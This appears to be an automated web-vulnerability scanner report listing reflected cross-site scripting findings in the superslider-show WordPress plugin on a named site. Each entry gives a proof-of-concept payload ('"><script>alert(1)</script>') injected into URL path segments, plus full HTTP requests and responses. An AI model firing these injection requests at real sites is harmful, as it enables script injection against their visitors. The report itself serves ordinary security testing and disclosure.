<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cceed"><script>alert(1)</script>accf7f7fb5a was submitted in the REST URL parameter 5. This input was echoed as cceed\"><script>alert(1)</script>accf7f7fb5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/jscceed"><script>alert(1)</script>accf7f7fb5a/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0971"><script>alert(1)</script>0fb985cf187 was submitted in the REST URL parameter 6. This input was echoed as b0971\"><script>alert(1)</script>0fb985cf187 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/js/lightbox.jsb0971"><script>alert(1)</script>0fb985cf187 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd21"><script>alert(1)</script>f0633c6001b was submitted in the REST URL parameter 1. This input was echoed as 4cd21\"><script>alert(1)</script>f0633c6001b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site4cd21"><script>alert(1)</script>f0633c6001b/wp-content/plugins/superslider-show/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae35"><script>alert(1)</script>8c6c868a5fe was submitted in the REST URL parameter 2. This input was echoed as eae35\"><script>alert(1)</script>8c6c868a5fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contenteae35"><script>alert(1)</script>8c6c868a5fe/plugins/superslider-show/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553e1"><script>alert(1)</script>04e840362be was submitted in the REST URL parameter 3. This input was echoed as 553e1\"><script>alert(1)</script>04e840362be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins553e1"><script>alert(1)</script>04e840362be/superslider-show/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abcc"><script>alert(1)</script>ee5f31f45bb was submitted in the REST URL parameter 4. This input was echoed as 8abcc\"><script>alert(1)</script>ee5f31f45bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show8abcc"><script>alert(1)</script>ee5f31f45bb/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e98"><script>alert(1)</script>2c612aa2c9c was submitted in the REST URL parameter 5. This input was echoed as f2e98\"><script>alert(1)</script>2c612aa2c9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/jsf2e98"><script>alert(1)</script>2c612aa2c9c/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8b9"><script>alert(1)</script>c2af7f63bf8 was submitted in the REST URL parameter 6. This input was echoed as 9e8b9\"><script>alert(1)</script>c2af7f63bf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/js/slideshow.js9e8b9"><script>alert(1)</script>c2af7f63bf8 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa93b"><script>alert(1)</script>da1c1d240d4 was submitted in the REST URL parameter 1. This input was echoed as fa93b\"><script>alert(1)</script>da1c1d240d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitefa93b"><script>alert(1)</script>da1c1d240d4/wp-content/plugins/superslider-show/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902a8"><script>alert(1)</script>5782793370 was submitted in the REST URL parameter 2. This input was echoed as 902a8\"><script>alert(1)</script>5782793370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content902a8"><script>alert(1)</script>5782793370/plugins/superslider-show/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd602"><script>alert(1)</script>efee82710e was submitted in the REST URL parameter 3. This input was echoed as cd602\"><script>alert(1)</script>efee82710e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginscd602"><script>alert(1)</script>efee82710e/superslider-show/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674579+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cfb"><script>alert(1)</script>2790aaf3378 was submitted in the REST URL parameter 4. This input was echoed as 32cfb\"><script>alert(1)</script>2790aaf3378 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show32cfb"><script>alert(1)</script>2790aaf3378/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12e6"><script>alert(1)</script>f6e7648297d was submitted in the REST URL parameter 5. This input was echoed as e12e6\"><script>alert(1)</script>f6e7648297d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/jse12e6"><script>alert(1)</script>f6e7648297d/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b1e"><script>alert(1)</script>7e580d589db was submitted in the REST URL parameter 6. This input was echoed as 59b1e\"><script>alert(1)</script>7e580d589db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/js/slimbox.js59b1e"><script>alert(1)</script>7e580d589db HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55536"><script>alert(1)</script>160905c159f was submitted in the REST URL parameter 1. This input was echoed as 55536\"><script>alert(1)</script>160905c159f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site55536"><script>alert(1)</script>160905c159f/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
